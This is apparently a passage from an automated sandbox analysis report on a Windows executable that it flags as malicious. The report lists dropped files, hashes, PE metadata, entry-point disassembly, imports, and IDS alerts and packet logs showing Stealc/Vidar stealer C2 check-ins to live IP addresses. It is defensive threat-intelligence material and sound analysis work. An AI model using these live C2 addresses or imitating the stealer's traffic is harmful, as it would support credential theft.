                                                                                                                                                                                                                                    Preview:...BPM.M.oe....Z.I..Y..t.........RIP\u.fZG..cFQ......h...DAO.P\...j...g.T..id..a...^.PttPbo..ei.i.Z..W.y.g..T_..bMVj.wWAP.v]..xQW..tW.kq..._q.B.nn....p.v.Ds.a.F...vT.Yga.o..A\PM..M.]s...u.lp[.sGmuvB.`YB..g.U....HTB[PU.y..moby..N..q...E.EOs.Q.C[C..^oAOo..sfe....wg.Z....Z...R.kx.DS.WYq.]..dXb.[k.xe.eQc..Z..L..IZ.X.f.x..q..u....Y.[ZH..[v..J.dT.I....RA._OW.x.cK..G]...xwZ....f.Nl`.p.ZS.yJ.J.p..`hn.hYg..u....[Qernk....P[.jJ.....l..RNf......ya.s.M...S.^[TyM..U.fFQ...w..v.KFw.X.....oS[h...NRj..UYt.....nM..d..G.R]j.x...Y.C..b....U.as`GOT.......T.d.GVQV...[.Ct[.`w.R..Vc..O.D.`.dH.jm..S[...Q.....LmoTY.D_.IM...uCtDVt.oW..LK.E..........Ek.fxT.e.f.p.a.O....gaQ.g.O..K.N..l.].......f.Z.[o...HVTJB.l.d.GYVD.U.o....^.F..uH.LH.n.f....Hx^kON..kT.Tld.T.KV.[...MM\NL...Z...R....pd......j..m.DhIFCSO..eMf.W..c.C.[..h.....y.^A..S.W...i.n....N.E.w_....QSGKKF.k.d.g..O...r...o..EKUV.....J...r...I..HU...]xFd.aq..GTC.s.a.p..J....r^GYK.P.C.....qH.....a[..V...FJIsJ._.WTIvtKE.k.me[...H..wTw.a....c...n[_.l...f.I....axf`O
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1596416
                                                                                                                                                                                                                                    Entropy (8bit):6.46619614175955
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:49152:n2gm39uH+I5/GxEoadcqX7Q9F7r40YB+eTcq+PDXx1lWz0v2:DmtuH+e/RoadcqX7Qz7rDY8vq+Pbx1lc
                                                                                                                                                                                                                                    MD5:10D51BECD0BBCE0FAB147FF9658C565E
                                                                                                                                                                                                                                    SHA1:4689A18112FF876D3C066BC8C14A08FD6B7B7A4A
                                                                                                                                                                                                                                    SHA-256:7B2DB9C88F60ED6DD24B1DEC321A304564780FDB191A96EC35C051856128F1ED
                                                                                                                                                                                                                                    SHA-512:29FAF493BB28F7842C905ADC5312F31741EFFB09F841059B53D73B22AEA2C4D41D73DB10BBF37703D6AEB936FFACBC756A3CC85BA3C0B6A6863EF4D27FEFCD29
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S1,..PB..PB..PB.x&.<PB.x&.PB.x&.cQB..(...PB..(.>PB..PC..SB.x&..PB.x&..PB.x&..PB.x&..PB.Rich.PB.........PE..L.....kU...........%.....\...........0.......p......................................1.....@.................................dP..|....p..........................z....}..................................@............p..,............................text...6Z.......\.................. ..`.rdata..J....p.......`..............@..@.data...\........Z...t..............@....rsrc........p......................@..@.reloc..6...........................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):87278
                                                                                                                                                                                                                                    Entropy (8bit):4.38402884518968
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:1536:X5B5jj6bWG+5cAD2Fno6ktTgDa+0rldAe7VwDb4bWTfmdI7p:X5Ljj6bi512Fn3b0Ie7qgbWd9
                                                                                                                                                                                                                                    MD5:A723BF46048E0BFB15B8D77D7A648C3E
                                                                                                                                                                                                                                    SHA1:8952D3C34E9341E4425571E10F22B782695BB915
                                                                                                                                                                                                                                    SHA-256:B440170853BDB43B66497F701AEE2901080326975140B095A1669CB9DEE13422
                                                                                                                                                                                                                                    SHA-512:CA8EA2F7F3C7AF21B5673A0A3F2611B6580A7ED02EFA2CFD8B343EB644FF09682BDE43B25EF7AAB68530D5CE31DCBD252C382DD336ECB610D4C4EBDE78347273
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:......P..E.o...]k.`...Y.....q.rsD.o.QPk.]fpZl\.R....DG..vyH^Q.....tpW........kgE.p.`O...............X..S.....x.....`.R.fZ.N...M..h...yC..H.O.XMQiV..sq..Ai.lV...Pv..WO].be.sU.nU..rGe.P....BE.MSnb.Lq....o.p..a.s..a..fEa..R..U.sNC.qZwI...XJ.M..H.h.........d.TSZR.UqXFj....Z.U..XTN.......B.CK...S._.^pjLRnbG^.u.D...mx..e......IYlK.l.....p._p.S.l...BZu..q.UG\.U....y.Xdi..Ff...rmqJ..V.AM.os.Oy..FV.._bNiEyiPIL.AW..GD.....che..iGU.oSi.Y..Yt.\].i.x.N.KN.`FKscyQ.M.....pqhieCU.c.ru..Melr.YRAM.Tg.......]..r.b.pP...._..gUo.`QvN.]il..G...q...NP.m.qHi.iiJ_^.[.Y...e.oHy.p.]..a...X.o....A.cL.C.A.._cQp..oD.L.L.O_.ewev.peB.ia..Ay.t.Y\W.]..l.F._i.....^.gDZTDNUj..dDM..o...........m..E........N.X..x...v..Cg....VuJ.k...Ec..JW`^yZ.u.B.im....T...C\.x..Z.G]B....u.r..gn.V...Q...mnN.quc.rM\..S...AjY.oVTa.p.Oebr.g........eC[A....cvqB..Ed..q.kR..BiYg`bQcA.E.XKs.\o.C..qyjUm.o..C..sc.F.xlnVI.q..q.Vs...p.Bg..O.dha..t..O.`x....c.n.....xr...f.ggn.LR[S..Aqk.j..u....nb.`Gd^...b.fYKZ^R..l...c..EbGm.pq..s..qwjn.`P...b..JE...t
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1835008
                                                                                                                                                                                                                                    Entropy (8bit):4.468161861235744
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:6144:+IXfpi67eLPU9skLmb0b4KWSPKaJG8nAgejZMMhA2gX4WABl0uNxdwBCswSby:TXD94KWlLZMM6YFHf+y
                                                                                                                                                                                                                                    MD5:9E1662B7CAD8098E2DAF64E3AEBF388D
                                                                                                                                                                                                                                    SHA1:40F19C9572E265218A149D3EFAAC6D0CA0D82FB5
                                                                                                                                                                                                                                    SHA-256:89416CF1347832A7BFD28E92BC788EFEFFDA2FA9D53204AB6AA47C08CE3A15D1
                                                                                                                                                                                                                                    SHA-512:CE7E32B0331D5ED0D000251810524EAC42A670D4D085E4F5F400F577309A5BE9EC7A851089A78661DB0387D7E5E35449301FD0999CB04EF56BBF9A14249C6561
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....1...............................................................................................................................................................................................................................................................................................................................................aF..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Entropy (8bit):7.331543347163832
                                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                    File name:VucRf0jboS.exe
                                                                                                                                                                                                                                    File size:441'857 bytes
                                                                                                                                                                                                                                    MD5:5cd97a765e0c9463f57769117db519fa
                                                                                                                                                                                                                                    SHA1:10cbbb15ce42e4328441109668ebda4d4b7c15eb
                                                                                                                                                                                                                                    SHA256:3b37fec0af4f32196086cfaad850c32113b60766190d283e2bc2f92a19b8cf20
                                                                                                                                                                                                                                    SHA512:b5a3d26c52d100bde2bf184dfcd2865a9289f86a7c100620f9e1eeec1d163e48715f215ae39f46d78266c6923ef12b9dfea140a56ff38cbd3ac0a606ce9c68df
                                                                                                                                                                                                                                    SSDEEP:12288:pzE/JXGSxAxt9y/SkVDi0XSOoaOAG634KKy:cXGSx89y/SkdOT6IKp
                                                                                                                                                                                                                                    TLSH:D6949C0372E1BC60E5664B3A9F1EA6EC372DF8608F64AB1732485D1F54752B0D363B92
                                                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ku.[Ku.[Ku.[F'e[Uu.[F'Z[.u.[F'[[du.[B.)[Hu.[Ku.[;u.[.._[Ju.[F'a[Ju.[..d[Ju.[RichKu.[................PE..L..._.)d...........
                                                                                                                                                                                                                                    Icon Hash:4b254d494d45610d
                                                                                                                                                                                                                                    Entrypoint:0x404102
                                                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                    DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                    Time Stamp:0x6429A25F [Sun Apr 2 15:42:23 2023 UTC]
                                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                                    OS Version Major:5
                                                                                                                                                                                                                                    OS Version Minor:1
                                                                                                                                                                                                                                    File Version Major:5
                                                                                                                                                                                                                                    File Version Minor:1
                                                                                                                                                                                                                                    Subsystem Version Major:5
                                                                                                                                                                                                                                    Subsystem Version Minor:1
                                                                                                                                                                                                                                    Import Hash:1cd8d44520c2e3583895f01ac332cc01
                                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                                    call 00007F95C4DDC942h
                                                                                                                                                                                                                                    jmp 00007F95C4DD6545h
                                                                                                                                                                                                                                    push 00000014h
                                                                                                                                                                                                                                    push 00418F90h
                                                                                                                                                                                                                                    call 00007F95C4DD84DDh
                                                                                                                                                                                                                                    call 00007F95C4DDB098h
                                                                                                                                                                                                                                    movzx esi, ax
                                                                                                                                                                                                                                    push 00000002h
                                                                                                                                                                                                                                    call 00007F95C4DDC8D5h
                                                                                                                                                                                                                                    pop ecx
                                                                                                                                                                                                                                    mov eax, 00005A4Dh
                                                                                                                                                                                                                                    cmp word ptr [00400000h], ax
                                                                                                                                                                                                                                    je 00007F95C4DD6546h
                                                                                                                                                                                                                                    xor ebx, ebx
                                                                                                                                                                                                                                    jmp 00007F95C4DD6575h
                                                                                                                                                                                                                                    mov eax, dword ptr [0040003Ch]
                                                                                                                                                                                                                                    cmp dword ptr [eax+00400000h], 00004550h
                                                                                                                                                                                                                                    jne 00007F95C4DD652Dh
                                                                                                                                                                                                                                    mov ecx, 0000010Bh
                                                                                                                                                                                                                                    cmp word ptr [eax+00400018h], cx
                                                                                                                                                                                                                                    jne 00007F95C4DD651Fh
                                                                                                                                                                                                                                    xor ebx, ebx
                                                                                                                                                                                                                                    cmp dword ptr [eax+00400074h], 0Eh
                                                                                                                                                                                                                                    jbe 00007F95C4DD654Bh
                                                                                                                                                                                                                                    cmp dword ptr [eax+004000E8h], ebx
                                                                                                                                                                                                                                    setne bl
                                                                                                                                                                                                                                    mov dword ptr [ebp-1Ch], ebx
                                                                                                                                                                                                                                    call 00007F95C4DDAA1Eh
                                                                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                                                                    jne 00007F95C4DD654Ah
                                                                                                                                                                                                                                    push 0000001Ch
                                                                                                                                                                                                                                    call 00007F95C4DD6621h
                                                                                                                                                                                                                                    pop ecx
                                                                                                                                                                                                                                    call 00007F95C4DDC4D3h
                                                                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                                                                    jne 00007F95C4DD654Ah
                                                                                                                                                                                                                                    push 00000010h
                                                                                                                                                                                                                                    call 00007F95C4DD6610h
                                                                                                                                                                                                                                    pop ecx
                                                                                                                                                                                                                                    call 00007F95C4DDAF60h
                                                                                                                                                                                                                                    and dword ptr [ebp-04h], 00000000h
                                                                                                                                                                                                                                    call 00007F95C4DD9A17h
                                                                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                                                                    jns 00007F95C4DD654Ah
                                                                                                                                                                                                                                    push 0000001Bh
                                                                                                                                                                                                                                    call 00007F95C4DD65F6h
                                                                                                                                                                                                                                    pop ecx
                                                                                                                                                                                                                                    call dword ptr [004130C4h]
                                                                                                                                                                                                                                    mov dword ptr [04042A10h], eax
                                                                                                                                                                                                                                    call 00007F95C4DDC929h
                                                                                                                                                                                                                                    mov dword ptr [00454FC0h], eax
                                                                                                                                                                                                                                    call 00007F95C4DDC526h
                                                                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                                                                    jns 00007F95C4DD654Ah
                                                                                                                                                                                                                                    Programming Language:
                                                                                                                                                                                                                                    • [ASM] VS2013 build 21005
                                                                                                                                                                                                                                    • [ C ] VS2013 build 21005
                                                                                                                                                                                                                                    • [C++] VS2013 build 21005
                                                                                                                                                                                                                                    • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                    • [RES] VS2013 build 21005
                                                                                                                                                                                                                                    • [LNK] VS2013 UPD5 build 40629
                                                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x193e40x28.rdata
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c430000x16b25.rsrc
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x3c5a0000x1454.reloc
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x132000x38.rdata
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x188c80x40.rdata
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x130000x190.rdata
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                    .text0x10000x118930x11a00d11986298e41d3938f6bd71b66d357deFalse0.60955507535461data6.689457188183286IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                    .rdata0x130000x6cd40x6e003ef318b1af2a27bc9b026b603611ed68False0.3873934659090909data4.723645842680116IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                    .data0x1a0000x3c28a280x3b000733e2c3aabd729c4b036a93678de23fbunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                    .rsrc0x3c430000x16b250x16c00f2945447f3a4000437ed3bb979860f58False0.42659684065934067data4.973500871049824IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                    .reloc0x3c5a0000x14540x1600e1e152770233974bda6dc894a10de5dbFalse0.7233664772727273data6.346854839875379IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                    RT_ICON0x3c436b80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 00.4066820276497696
                                                                                                                                                                                                                                    RT_ICON0x3c43d800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.16400414937759336
                                                                                                                                                                                                                                    RT_ICON0x3c463280x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.21365248226950354
                                                                                                                                                                                                                                    RT_ICON0x3c467900xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.3694029850746269
                                                                                                                                                                                                                                    RT_ICON0x3c476380x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.4562274368231047
                                                                                                                                                                                                                                    RT_ICON0x3c47ee00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 00.46255760368663595
                                                                                                                                                                                                                                    RT_ICON0x3c485a80x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.4486994219653179
                                                                                                                                                                                                                                    RT_ICON0x3c48b100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.2671161825726141
                                                                                                                                                                                                                                    RT_ICON0x3c4b0b80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.30909943714821764
                                                                                                                                                                                                                                    RT_ICON0x3c4c1600x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.35904255319148937
                                                                                                                                                                                                                                    RT_ICON0x3c4c5c80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.5682302771855011
                                                                                                                                                                                                                                    RT_ICON0x3c4d4700x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.5509927797833934
                                                                                                                                                                                                                                    RT_ICON0x3c4dd180x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.6134393063583815
                                                                                                                                                                                                                                    RT_ICON0x3c4e2800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.46255186721991703
                                                                                                                                                                                                                                    RT_ICON0x3c508280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.4899155722326454
                                                                                                                                                                                                                                    RT_ICON0x3c518d00x988Device independent bitmap graphic, 24 x 48 x 32, image size 00.49631147540983606
                                                                                                                                                                                                                                    RT_ICON0x3c522580x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.44769503546099293
                                                                                                                                                                                                                                    RT_ICON0x3c526c00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.4229744136460554
                                                                                                                                                                                                                                    RT_ICON0x3c535680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.4833032490974729
                                                                                                                                                                                                                                    RT_ICON0x3c53e100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 00.5858294930875576
                                                                                                                                                                                                                                    RT_ICON0x3c544d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5079479768786127
                                                                                                                                                                                                                                    RT_ICON0x3c54a400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.47271784232365144
                                                                                                                                                                                                                                    RT_ICON0x3c56fe80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.48545966228893056
                                                                                                                                                                                                                                    RT_ICON0x3c580900x988Device independent bitmap graphic, 24 x 48 x 32, image size 00.49508196721311476
                                                                                                                                                                                                                                    RT_ICON0x3c58a180x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.5452127659574468
                                                                                                                                                                                                                                    RT_STRING0x3c58e800x332data0.47555012224938875
                                                                                                                                                                                                                                    RT_STRING0x3c591b40x354data0.46830985915492956
                                                                                                                                                                                                                                    RT_GROUP_ICON0x3c595080x68data0.7115384615384616
                                                                                                                                                                                                                                    RT_GROUP_ICON0x3c595700x68data0.6826923076923077
                                                                                                                                                                                                                                    RT_GROUP_ICON0x3c595d80x30data0.9375
                                                                                                                                                                                                                                    RT_GROUP_ICON0x3c596080x76data0.6779661016949152
                                                                                                                                                                                                                                    RT_VERSION0x3c596800x244data0.5396551724137931
                                                                                                                                                                                                                                    RT_MANIFEST0x3c598c40x261XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (549), with CRLF line terminators0.5451559934318555
                                                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                                                    KERNEL32.dllGetSystemDefaultLangID, GlobalMemoryStatus, FindResourceA, GetLocaleInfoA, LoadLibraryExW, InterlockedDecrement, GetComputerNameW, GetSystemDefaultLCID, BackupSeek, GetTickCount, GetConsoleAliasesA, GetWindowsDirectoryA, EnumTimeFormatsW, SetCommState, GlobalAlloc, GetVolumeInformationA, LoadLibraryW, LocalShrink, ReadConsoleInputA, WriteConsoleW, GetModuleFileNameW, MultiByteToWideChar, GetLastError, ChangeTimerQueueTimer, SetLastError, GetThreadLocale, GetProcAddress, RemoveDirectoryA, SetFileAttributesA, LoadLibraryA, SetCalendarInfoW, CreateHardLinkW, GetExitCodeThread, CreateEventW, QueryDosDeviceW, AddAtomA, GlobalFindAtomW, GetOEMCP, BuildCommDCBA, VirtualProtect, GetConsoleProcessList, GetTempPathA, EncodePointer, DecodePointer, HeapReAlloc, ExitProcess, GetModuleHandleExW, AreFileApisANSI, WideCharToMultiByte, GetCommandLineA, RaiseException, RtlUnwind, IsProcessorFeaturePresent, IsDebuggerPresent, HeapFree, HeapAlloc, EnterCriticalSection, LeaveCriticalSection, FlushFileBuffers, WriteFile, GetConsoleCP, GetConsoleMode, DeleteCriticalSection, HeapSize, GetStdHandle, GetFileType, GetStartupInfoW, GetProcessHeap, CloseHandle, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, IsValidCodePage, GetACP, GetCPInfo, GetCurrentThreadId, GetModuleFileNameA, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, SetFilePointerEx, LCMapStringW, OutputDebugStringW, GetStringTypeW, CreateFileW, SetEndOfFile, ReadFile, ReadConsoleW
                                                                                                                                                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                    04/27/24-01:31:08.487333TCP2856233ETPRO TROJAN Win32/Unknown Loader Related Activity (GET)4973080192.168.2.4185.172.128.90
                                                                                                                                                                                                                                    04/27/24-01:31:16.462312TCP2051831ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M18049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    04/27/24-01:31:14.075716TCP2044243ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    04/27/24-01:31:15.895415TCP2044244ET TROJAN Win32/Stealc Requesting browsers Config from C24973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    04/27/24-01:31:16.178347TCP2051828ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M18049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    04/27/24-01:31:16.180488TCP2044246ET TROJAN Win32/Stealc Requesting plugins Config from C24973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:08.316412926 CEST4973080192.168.2.4185.172.128.90
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:08.487085104 CEST8049730185.172.128.90192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:08.487227917 CEST4973080192.168.2.4185.172.128.90
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:08.487333059 CEST4973080192.168.2.4185.172.128.90
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:08.659436941 CEST8049730185.172.128.90192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:10.140281916 CEST8049730185.172.128.90192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:10.193240881 CEST4973080192.168.2.4185.172.128.90
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:11.083406925 CEST4973080192.168.2.4185.172.128.90
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:11.104739904 CEST4973180192.168.2.4185.172.128.228
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:11.276055098 CEST8049731185.172.128.228192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:11.276169062 CEST4973180192.168.2.4185.172.128.228
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:11.276288033 CEST4973180192.168.2.4185.172.128.228
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:11.737292051 CEST4973180192.168.2.4185.172.128.228
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:11.909100056 CEST8049731185.172.128.228192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:11.909671068 CEST8049731185.172.128.228192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:11.942275047 CEST4973180192.168.2.4185.172.128.228
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:11.962421894 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.133594036 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.133706093 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.137057066 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.307507038 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.307903051 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.307943106 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.307984114 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.308022976 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.308053970 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.308059931 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.308082104 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.308118105 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.308157921 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.308166981 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.308196068 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.308233976 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.308244944 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.308273077 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.308326006 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.480509043 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.480552912 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.480591059 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.480628967 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.480660915 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.480667114 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.480706930 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.480736017 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.480788946 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.480814934 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.480920076 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.480988979 CEST4973280192.168.2.4185.172.128.59
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.481034040 CEST8049732185.172.128.59192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.481106043 CEST8049732185.172.128.59192.168.2.4
